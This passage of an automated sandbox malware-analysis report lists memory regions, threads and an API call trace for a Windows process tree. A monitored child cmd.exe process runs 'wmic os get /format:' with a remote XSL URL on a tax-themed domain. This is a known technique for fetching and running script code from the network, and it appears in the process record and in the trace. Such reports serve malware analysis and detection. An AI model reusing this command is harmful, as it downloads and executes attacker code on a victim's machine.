	          end_va = 0x2da7eb70fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eb70000"
	        filename = ""

Region:
	              id = 1663
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 1664
	        start_va = 0x2da7eb80000
	          end_va = 0x2da7eb80fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eb80000"
	        filename = ""

Region:
	              id = 1665
	        start_va = 0x7ffc07c20000
	          end_va = 0x7ffc07c3cfff
	     entry_point = 0x7ffc07c20000
	     region_type = mapped_file
	            name = "wdi.dll"
	        filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")

Region:
	              id = 1666
	        start_va = 0xdff4c00000
	          end_va = 0xdff4c7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4c00000"
	        filename = ""

Region:
	              id = 1667
	        start_va = 0xdff4c80000
	          end_va = 0xdff4cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000dff4c80000"
	        filename = ""

Region:
	              id = 1668
	        start_va = 0x2da7eb90000
	          end_va = 0x2da7eb91fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002da7eb90000"
	        filename = ""

Region:
	              id = 1669
	        start_va = 0x7ffbf2450000
	          end_va = 0x7ffbf24effff
	     entry_point = 0x7ffbf2450000
	     region_type = mapped_file
	            name = "wer.dll"
	        filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")

Region:
	              id = 1670
	        start_va = 0x7ffbf6550000
	          end_va = 0x7ffbf6566fff
	     entry_point = 0x7ffbf6550000
	     region_type = mapped_file
	            name = "radarrs.dll"
	        filename = "\\Windows\\System32\\radarrs.dll" (normalized: "c:\\windows\\system32\\radarrs.dll")

Region:
	              id = 1671
	        start_va = 0x7ffc08000000
	          end_va = 0x7ffc08009fff
	     entry_point = 0x7ffc08000000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 1672
	        start_va = 0x7ffc097b0000
	          end_va = 0x7ffc09a23fff
	     entry_point = 0x7ffc097b0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1673
	        start_va = 0x7ffc09ab0000
	          end_va = 0x7ffc09ae2fff
	     entry_point = 0x7ffc09ab0000
	     region_type = mapped_file
	            name = "rstrtmgr.dll"
	        filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll")

Region:
	              id = 1674
	        start_va = 0x7ffc13550000
	          end_va = 0x7ffc13589fff
	     entry_point = 0x7ffc13550000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")

Region:
	              id = 1675
	        start_va = 0x7ffc13590000
	          end_va = 0x7ffc135b6fff
	     entry_point = 0x7ffc13590000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")

Region:
	              id = 1676
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 1677
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1678
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1679
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1680
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1681
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1682
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1683
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1684
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1685
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")


Thread:
	id = 172
	os_tid = 0xf44


Thread:
	id = 173
	os_tid = 0xf60


Thread:
	id = 174
	os_tid = 0xf54


Thread:
	id = 175
	os_tid = 0xf70


Thread:
	id = 176
	os_tid = 0xf68


Thread:
	id = 177
	os_tid = 0xfac


Thread:
	id = 180
	os_tid = 0x898


Process:
	id = "8"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x61c5f000"
	os_pid = "0xcd4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xed8"
	cmd_line = "CMD.EXE  /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1733
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1734
	        start_va = 0x183c600000
	          end_va = 0x183c7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000183c600000"
	        filename = ""

Region:
	              id = 1735
	        start_va = 0x183c800000
	          end_va = 0x183c8fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000183c800000"
	        filename = ""

Region:
	              id = 1736
	        start_va = 0x18a09850000
	          end_va = 0x18a0986ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018a09850000"
	        filename = ""

Region:
	              id = 1737
	        start_va = 0x18a09870000
	          end_va = 0x18a09884fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018a09870000"
	        filename = ""

Region:
	              id = 1738
	        start_va = 0x18a09890000
	          end_va = 0x18a09893fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018a09890000"
	        filename = ""

Region:
	              id = 1739
	        start_va = 0x18a098a0000
	          end_va = 0x18a098a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018a098a0000"
	        filename = ""

Region:
	              id = 1740
	        start_va = 0x18a098b0000
	          end_va = 0x18a098b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018a098b0000"
	        filename = ""

Region:
	              id = 1741
	        start_va = 0x7df5ff480000
	          end_va = 0x7ff5ff47ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff480000"
	        filename = ""

Region:
	              id = 1742
	        start_va = 0x7ff648110000
	          end_va = 0x7ff648132fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff648110000"
	        filename = ""

Region:
	              id = 1743
	        start_va = 0x7ff649110000
	          end_va = 0x7ff649169fff
	     entry_point = 0x7ff649110000
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1744
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1745
	        start_va = 0x18a09850000
	          end_va = 0x18a0985ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018a09850000"
	        filename = ""

Region:
	              id = 1746
	        start_va = 0x18a09980000
	          end_va = 0x18a09a7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018a09980000"
	        filename = ""

Region:
	              id = 1747
	        start_va = 0x7ff648010000
	          end_va = 0x7ff64810ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff648010000"
	        filename = ""

Region:
	              id = 1748
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1749
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1823
	        start_va = 0x183c900000
	          end_va = 0x183c9fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000183c900000"
	        filename = ""

Region:
	              id = 1824
	        start_va = 0x18a09860000
	          end_va = 0x18a09866fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018a09860000"
	        filename = ""

Region:
	              id = 1825
	        start_va = 0x18a098c0000
	          end_va = 0x18a0997dfff
	     entry_point = 0x18a098c0000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1826
	        start_va = 0x18a09bf0000
	          end_va = 0x18a09bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018a09bf0000"
	        filename = ""

Region:
	              id = 1827
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1828
	        start_va = 0x18a09a80000
	          end_va = 0x18a09a86fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018a09a80000"
	        filename = ""

Region:
	              id = 1829
	        start_va = 0x18a09c00000
	          end_va = 0x18a09f36fff
	     entry_point = 0x18a09c00000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 181
	os_tid = 0xce8

	[0110.517] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff649110000
	[0110.517] __set_app_type (_Type=0x1) 
	[0110.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff649125700) returned 0x0
	[0110.518] __getmainargs (in: _Argc=0x7ff649140108, _Argv=0x7ff649140110, _Env=0x7ff649140118, _DoWildCard=0, _StartInfo=0x7ff649140124 | out: _Argc=0x7ff649140108, _Argv=0x7ff649140110, _Env=0x7ff649140118) returned 0
	[0110.518] GetCurrentThreadId () returned 0xce8
	[0110.518] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xce8) returned 0x6c
	[0110.518] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc17120000
	[0110.518] GetProcAddress (hModule=0x7ffc17120000, lpProcName="SetThreadUILanguage") returned 0x7ffc17143270
	[0110.518] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0110.520] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0110.520] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x183c8ffc18 | out: phkResult=0x183c8ffc18*=0x0) returned 0x2
	[0110.520] VirtualQuery (in: lpAddress=0x183c8ffc04, lpBuffer=0x183c8ffb80, dwLength=0x30 | out: lpBuffer=0x183c8ffb80*(BaseAddress=0x183c8ff000, AllocationBase=0x183c800000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0110.520] VirtualQuery (in: lpAddress=0x183c800000, lpBuffer=0x183c8ffb80, dwLength=0x30 | out: lpBuffer=0x183c8ffb80*(BaseAddress=0x183c800000, AllocationBase=0x183c800000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0110.520] VirtualQuery (in: lpAddress=0x183c801000, lpBuffer=0x183c8ffb80, dwLength=0x30 | out: lpBuffer=0x183c8ffb80*(BaseAddress=0x183c801000, AllocationBase=0x183c800000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0110.520] VirtualQuery (in: lpAddress=0x183c804000, lpBuffer=0x183c8ffb80, dwLength=0x30 | out: lpBuffer=0x183c8ffb80*(BaseAddress=0x183c804000, AllocationBase=0x183c800000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0110.520] VirtualQuery (in: lpAddress=0x183c900000, lpBuffer=0x183c8ffb80, dwLength=0x30 | out: lpBuffer=0x183c8ffb80*(BaseAddress=0x183c900000, AllocationBase=0x183c900000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0110.520] GetConsoleOutputCP () returned 0x1b5
	[0110.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff649149660 | out: lpCPInfo=0x7ff649149660) returned 1
	[0110.520] SetConsoleCtrlHandler (HandlerRoutine=0x7ff649132ad0, Add=1) returned 1
	[0110.520] _get_osfhandle (_FileHandle=1) returned 0x24
	[0110.520] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1
	[0110.521] _get_osfhandle (_FileHandle=1) returned 0x24
	[0110.521] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff64914960c | out: lpMode=0x7ff64914960c) returned 1
	[0110.521] _get_osfhandle (_FileHandle=1) returned 0x24
	[0110.521] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1
	[0110.521] _get_osfhandle (_FileHandle=0) returned 0x20
	[0110.521] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff649149608 | out: lpMode=0x7ff649149608) returned 1
	[0110.521] _get_osfhandle (_FileHandle=0) returned 0x20
	[0110.521] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1
	[0110.522] GetEnvironmentStringsW () returned 0x18a09985730*
	[0110.522] FreeEnvironmentStringsA (penv="=") returned 1
	[0110.522] GetEnvironmentStringsW () returned 0x18a09985730*
	[0110.522] FreeEnvironmentStringsA (penv="=") returned 1
	[0110.522] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x183c8feac8 | out: phkResult=0x183c8feac8*=0x78) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x0, lpData=0x183c8feae0*=0x0, lpcbData=0x183c8feac4*=0x1000) returned 0x2
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x1, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x0, lpData=0x183c8feae0*=0x1, lpcbData=0x183c8feac4*=0x1000) returned 0x2
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x0, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x40, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x40, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x0, lpData=0x183c8feae0*=0x40, lpcbData=0x183c8feac4*=0x1000) returned 0x2
	[0110.522] RegCloseKey (hKey=0x78) returned 0x0
	[0110.522] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x183c8feac8 | out: phkResult=0x183c8feac8*=0x78) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x0, lpData=0x183c8feae0*=0x40, lpcbData=0x183c8feac4*=0x1000) returned 0x2
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x1, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x0, lpData=0x183c8feae0*=0x1, lpcbData=0x183c8feac4*=0x1000) returned 0x2
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x0, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x9, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.522] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x4, lpData=0x183c8feae0*=0x9, lpcbData=0x183c8feac4*=0x4) returned 0x0
	[0110.523] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x183c8feac0, lpData=0x183c8feae0, lpcbData=0x183c8feac4*=0x1000 | out: lpType=0x183c8feac0*=0x0, lpData=0x183c8feae0*=0x9, lpcbData=0x183c8feac4*=0x1000) returned 0x2
	[0110.523] RegCloseKey (hKey=0x78) returned 0x0
	[0110.523] time (in: timer=0x0 | out: timer=0x0) returned 0x5b32a956
	[0110.523] srand (_Seed=0x5b32a956) 
	[0110.523] GetCommandLineW () returned="CMD.EXE  /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	[0110.523] GetCommandLineW () returned="CMD.EXE  /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	[0110.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff649151940 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0110.523] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18a099879f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\CMD.EXE" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0110.523] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0110.523] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0110.523] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0110.523] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0110.523] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0110.523] GetEnvironmentStringsW () returned 0x18a09985730*
	[0110.523] FreeEnvironmentStringsA (penv="=") returned 1
	[0110.523] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0110.523] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0110.523] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0110.524] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0110.524] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0110.524] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0110.524] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0110.524] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0110.524] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0110.524] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0110.524] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x183c8ff8d0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0110.524] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x104, lpBuffer=0x183c8ff8d0, lpFilePart=0x183c8ff8b0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x183c8ff8b0*="Desktop") returned 0x19
	[0110.524] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0110.524] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x183c8ff5e0 | out: lpFindFileData=0x183c8ff5e0) returned 0x18a099808b0
	[0110.524] FindClose (in: hFindFile=0x18a099808b0 | out: hFindFile=0x18a099808b0) returned 1
	[0110.524] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi", lpFindFileData=0x183c8ff5e0 | out: lpFindFileData=0x183c8ff5e0) returned 0x18a09980720
	[0110.525] FindClose (in: hFindFile=0x18a09980720 | out: hFindFile=0x18a09980720) returned 1
	[0110.525] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", lpFindFileData=0x183c8ff5e0 | out: lpFindFileData=0x183c8ff5e0) returned 0x18a09980720
	[0110.525] FindClose (in: hFindFile=0x18a09980720 | out: hFindFile=0x18a09980720) returned 1
	[0110.525] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0110.525] SetCurrentDirectoryW (lpPathName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 1
	[0110.525] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\Nd9E1FYi\\Desktop") returned 1
	[0110.525] GetEnvironmentStringsW () returned 0x18a09988790*
	[0110.525] FreeEnvironmentStringsA (penv="=") returned 1
	[0110.525] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff649151940 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0110.525] GetConsoleOutputCP () returned 0x1b5
	[0110.526] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff649149660 | out: lpCPInfo=0x7ff649149660) returned 1
	[0110.526] GetUserDefaultLCID () returned 0x409
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff64914d6a0, cchData=8 | out: lpLCData=":") returned 2
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x183c8ffa00, cchData=128 | out: lpLCData="0") returned 2
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x183c8ffa00, cchData=128 | out: lpLCData="0") returned 2
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x183c8ffa00, cchData=128 | out: lpLCData="1") returned 2
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff64914d6b0, cchData=8 | out: lpLCData="/") returned 2
